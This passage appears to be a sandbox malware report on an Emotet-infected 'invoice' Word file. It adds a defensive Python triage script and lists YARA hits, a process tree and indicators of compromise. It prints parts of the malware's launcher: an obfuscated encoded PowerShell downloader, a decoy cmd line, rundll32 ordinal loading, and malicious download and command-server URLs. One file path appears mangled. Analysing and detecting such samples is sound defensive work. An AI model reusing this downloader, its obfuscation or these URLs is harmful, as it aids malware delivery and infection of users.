gAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC
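The launcher chain recorded under the signatures above (a caret-escaped cmd.exe line with an msg.exe decoy, `powershell -w hidden -enc`, rundll32 loading `P44G.dll` from the user profile, then modules with non-DLL extensions and the ordinal export `#1` under randomly named SysWOW64 subdirectories) can be triaged offline from the command lines alone. The Python below is an added example written for this report; it is not Joe Sandbox output and not code from the sample. It strips cmd.exe carets, decodes the `-enc` payload (base64 over UTF-16LE, accepting the `-e`/`-ec`/`-enc` short forms), statically folds the `"{0}{2}…" -f 'a','b'` and `'a'+'b'` string-building visible in the decoded script, and lists what to flag on each rundll32 line. The command lines and the `$L5brdwf` fragment are copied from the report; the base64 blob is constructed here because the report's blob is truncated, and mapping the `x [ sh b` token to `http` is an assumption (the decoded script builds `$Pzpxt0n` as `http` but is cut off before the replace that applies it).

```python
import base64
import re
from typing import List, Optional

# Added example for this report, not Joe Sandbox or Emotet code. Inputs are copied
# from the report's process tree except where marked CONSTRUCTED.

def decaret(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: `^x` -> `x`, so `m^s^g` is `msg`."""
    return re.sub(r"\^(.)", r"\1", cmdline, flags=re.S)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Script behind -e/-ec/-enc/-EncodedCommand (any prefix accepted), or None.
    powershell.exe expects base64 over UTF-16LE; a truncated blob is cut back to
    whole 4-character groups so the readable prefix still decodes."""
    for m in re.finditer(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            blob = blob[: len(blob) // 4 * 4]
            return base64.b64decode(blob).decode("utf-16-le", errors="ignore")
    return None

FORMAT_OP = re.compile(r"""\(\s*"([^"]*)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)""", re.I)

def fold_format_operators(script: str) -> str:
    """Statically evaluate ("{0}{2}{1}" -f 'a','b','c'). PowerShell's -f uses the
    same positional placeholders as str.format, so hidden type names such as
    SYsTem.io.directory fall out without running anything."""
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        try:
            return "('" + m.group(1).format(*args) + "')"
        except (IndexError, KeyError, ValueError):
            return m.group(0)
    return FORMAT_OP.sub(repl, script)

def fold_concat(expr: str) -> str:
    """Collapse an expression built only from 'literal' + 'literal' pieces."""
    return "".join(re.findall(r"'([^']*)'", expr))

def extract_urls(url_list: str, token: str = "x [ sh b", scheme: str = "http") -> List[str]:
    """Split the '!'-separated download list and restore the scheme. ASSUMPTION: the
    report shows $Pzpxt0n built as 'http' but is cut off before the -replace that
    applies it, so the token-to-scheme mapping is supplied here, not observed."""
    return [u for u in url_list.replace(token, scheme).split("!") if "://" in u]

RUNDLL = re.compile(
    r"""rundll32(?:\.exe)?['"]?\s+['"]?(?P<mod>[^'",\s]+)['"]?(?:\s*,\s*|\s+)(?P<exp>\S+)""", re.I)

def rundll32_findings(cmdline: str) -> List[str]:
    """Signals to flag on a rundll32 line: non-.dll module name, ordinal-only export,
    module under a subdirectory of the system directory or in a user profile."""
    m = RUNDLL.search(cmdline)
    if not m:
        return []
    mod, exp = m.group("mod"), m.group("exp")
    out = []
    if not mod.lower().endswith(".dll"):
        out.append("module without .dll extension: " + mod.rsplit("\\", 1)[-1])
    if exp.startswith("#"):
        out.append("export called by ordinal " + exp)
    if re.match(r"(?i)c:\\windows\\(system32|syswow64)\\[^\\]+\\", mod):
        out.append("module in a subdirectory of the system directory")
    if mod.lower().startswith("c:\\users\\"):
        out.append("module loaded from a user profile path")
    return out

def triage_cmd_line(cmdline: str) -> dict:
    """Launcher pipeline: de-caret, decode -enc, fold -f operators, note -w hidden."""
    plain = decaret(cmdline)
    script = decode_encoded_command(plain) or ""
    return {"decareted": plain, "script": script,
            "folded": fold_format_operators(script),
            "hidden_window": bool(re.search(r"(?i)\s-w(?:indowstyle)?\s+hidden", plain))}

# CONSTRUCTED: the decoded script's first statement, re-encoded, because the
# report's own blob is truncated.
CONSTRUCTED_SCRIPT = ('sET-iTem vARIABle:4PuW ([TypE]("{0}{2}{4}{1}{3}" -f '
                      "'S','rect','YsT','ory','em.io.di'))")
CONSTRUCTED_BLOB = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMD = (r"cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to "
              r"op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + CONSTRUCTED_BLOB)
# Start of the $L5brdwf download list, as shown in the report's decoded script.
URL_LIST_FRAGMENT = (
    r"(('x'+' [ sh '+'b:')+'//'+'m'+'i'+'cr'+'o'+'ne'+'ws'+'.'+'e'+('u/'+'c'+'ranksh')+'af'"
    r"+('t-'+'pulley'+'-i5a'+'io/Tlp/')+'!x'+(' [ s'+'h ')+'b'+':'+'/'+('/o'+'fe')"
    r"+('rt-'+'a'+'l.c')+'om'+'/'+'wp'+'-c'+('ontent'+'/'+'t'+'9hV')+'Vi'+'B'+('de/!'+'x [')")
# rundll32 command lines from the report's process creations.
SAMPLE_RUNDLL32 = [
    r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1",
]
```

Calling `triage_cmd_line(SAMPLE_CMD)` returns the de-careted launcher, the decoded statement and its folded form with `SYsTem.io.directory` in place of the `-f` expression; `extract_urls(fold_concat(URL_LIST_FRAGMENT))` yields the first two download URLs of the list; `rundll32_findings` on the last sample line reports the `.lyo` module name, the `#1` ordinal and the SysWOW64 subdirectory. The same 24-character prefix of the report's real blob, `cwBFAFQALQBpAFQAZQBtACAA`, decodes to `sET-iTem `, which is how the truncated blob on the page can still be partially read.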

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000007.00000002.2108297042.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2176998214.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163049071.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163022289.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2207154366.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194263784.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127194669.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165761420.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203773462.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343620375.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2214139159.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117125447.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2152468849.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343633692.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2345772809.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104940723.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203786691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2219092978.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2172234783.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2129920680.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151842869.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2183013093.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2139440408.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2118447591.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193360956.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138274232.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138258236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104991832.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127180650.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2186208381.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193376705.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117147382.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Behavior Graph ID: 343627 Sample: Invoice 6682363.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100

Invoice 6682363.doc (sample)
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 16 other signatures
  started: cmd.exe
    Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
    started: powershell.exe 12 9
      DNS/IP: micronews.eu 93.119.104.27 (ports 49167, 49168, 80; VIRTONO-NETWORKSRO, Romania); ofert-al.com
      Dropped file: C:\Users\user45dczqyb\Haf0_yn\P44G.dll (PE32)
      Signature: Powershell drops PE file
      started: rundll32.exe
        started: rundll32.exe
          started: rundll32.exe 2
            Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            started: rundll32.exe
              started: rundll32.exe 1
                Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                started: rundll32.exe
                  started: rundll32.exe 1
                    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                    started: rundll32.exe
    started: msg.exe
  started: WINWORD.EXE 293 23

Contacted Public IPs

IP              Domain   Country    ASN     ASN Name            Malicious
190.55.186.229  unknown  Argentina  27747   TelecentroSAAR      true
93.119.104.27   unknown  Romania    203523  VIRTONO-NETWORKSRO  true

Contacted Domains

Name          IP             Active
ofert-al.com  93.119.104.27  true
micronews.eu  93.119.104.27  true

Contacted URLs

Name: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/
  Malicious: true
  Antivirus Detection: 13% (Virustotal); Avira URL Cloud: malware
  Reputation: unknown

Name: http://190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
  Malicious: true
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown

Name: http://ofert-al.com/wp-content/t9hVViBde/
  Malicious: true
  Antivirus Detection: Avira URL Cloud: malware
  Reputation: unknown